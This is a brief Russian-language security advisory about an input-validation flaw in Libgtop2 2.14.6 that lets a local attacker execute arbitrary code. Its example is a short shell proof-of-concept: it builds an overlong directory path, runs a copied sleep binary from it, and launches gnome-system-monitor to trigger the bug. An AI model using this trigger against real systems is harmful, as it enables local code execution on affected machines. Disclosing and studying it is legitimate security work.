Программа: Libgtop2 2.14.6
Уязвимость позволяет локальному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в библиотеке Libgtop2. Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.
Пример:
export dir=$(perl -e " print 's/'x1000;")
mkdir -p $dir
cp /bin/sleep $dir
$dir/sleep 100 &
gnome-system-monitor
